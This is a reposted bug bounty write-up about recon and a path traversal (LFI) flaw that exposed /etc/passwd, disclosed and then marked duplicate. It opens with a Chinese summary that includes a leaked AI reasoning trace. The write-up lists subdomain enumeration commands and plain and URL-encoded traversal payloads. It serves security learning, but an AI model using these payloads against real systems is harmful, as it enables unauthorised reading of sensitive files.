From Rooted to Rejected: How I Found an LFI… Then Got a “Duplicate” Anyway
嗯,用户让我帮忙总结一篇文章的内容,控制在一百个字以内。首先,我需要仔细阅读这篇文章,理解其主要内容和结构。 文章主要讲述了一个研究人员如何发现一个真实的本地文件包含(LFI)漏洞,访问敏感文件如/etc/passwd,并负责任地报告该漏洞,最终在短时间内被修复。然而,两天后被告知这是一个重复的漏洞。 接下来,我需要提取关键信息:发现了LFI漏洞、报告并修复、被标记为重复。然后用简洁的语言把这些点连贯起来,确保在100字以内。 还要注意用户的要求,不要使用“文章内容总结”之类的开头,直接描述即可。最后检查字数是否符合要求。 </think> 研究人员发现了一个本地文件包含(LFI)漏洞,成功访问了敏感文件并报告给目标方。漏洞在1小时内被修复,但两天后被告知这是重复报告。尽管如此,研究人员认为这仍是一次成功的安全测试,并强调了负责任披露的重要性。 2025-12-15 07:45:8 Author: infosecwriteups.com(查看原文) 阅读量:3 收藏

Shah kaif

By

| “If you’re getting dupes, you’re not unlucky — you’re just inches away from payout.” | LinkedIn

Press enter or click to view image in full size

Overview

In this post, I’ll walk you through how I discovered a Local File Inclusion (LFI) vulnerability on a real-world target, accessed sensitive files like /etc/passwd, reported it responsibly, and even saw it patched within an hour
Only to be told two days later that it was a duplicate.

Welcome to bug bounty — where you can be right, make impact, and still walk away with zero payout. Here’s how it went down.

Step 1: Recon Like You Mean It

I started with a full passive recon pipeline to identify the maximum attack surface:

amass enum -passive -d target.com -o amass.txt
subfinder -d target.com -o subfinder.txt
sublist3r -d target.com -o sublist3r.txt
assetfinder --subs-only target.com > assetfinder.txt

Combined and cleaned the output:

cat amass.txt subfinder.txt sublist3r.txt assetfinder.txt | sort -u > final_subdomains.txt

Step 2: Finding Live Hosts

To narrow down the scope, I ran:

httpx -l final_subdomains.txt -o live_subdomains.txt

And collected metadata:

httpx -title -td -server -sc -ip -cname -cdn -silent -l live_subdomains.txt -o live_metadata.txt

One subdomain stood out — running Apache, serving some odd static files, and lacking URL sanitization.

Step 3: Manual Fuzzing = Gold

Just manual URL tampering and eyes on response codes. I spotted a file download endpoint and started fuzzing:

https://target.com/icons/../../../../../../../../etc/passwd

Then tried an encoded variant:

https://target.com/icons/.%2e%2e/.%2e%2e/.%2e%2e/.%2e%2e/etc/passwd

And boom 💥 — /etc/passwd dumped in plain text.

Press enter or click to view image in full size

Critical impact. Classic LFI. Valid target.

Press enter or click to view image in full size

Step 4: Report & Rapid Fix and Validation

After Reporting within 1 hour, the endpoint was patched.

  • I verified that the LFI was no longer accessible
  • Received acknowledgment from the team
  • Felt good — this looked solid

At this point, I assumed the bug was accepted.

Press enter or click to view image in full size

Step 5: Two Days Later…

Out of nowhere — two days later — the final verdict came in:

This is a duplicate. Another researcher reported this earlier.”

Even though:

  • The bug was still live when I found and reported it
  • It was fixed only after my submission
  • The triage team had acknowledged it as valid first

The duplicate tag still stood.

A Word to Other Hackers

“Just because it’s marked duplicate, doesn’t mean your work was worthless.”

You built the recon chain.
You found the vulnerability.
You wrote the report.
And your report led to the fix.

Get Shah kaif’s stories in your inbox

Join Medium for free to get updates from this writer.

That’s still a win. It’s validation of your process and skill — and next time, you might just beat the other guy by a minute.

Final Thoughts

Bug bounty isn’t just about payout — it’s about proof of skill, pattern recognition, and timing. This experience reminded me:

  • Recon matters
  • Manual review still wins
  • Timing can be cruel
  • But impact always matters

Even if you get a “duplicate,” remember:

“If you’re getting dupes, you’re not unlucky — you’re just inches away from payout.”

Stay sharp, stay hunting. 🕶️


文章来源: https://infosecwriteups.com/from-rooted-to-rejected-how-i-found-an-lfi-then-got-a-duplicate-anyway-c353e8088ce4?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh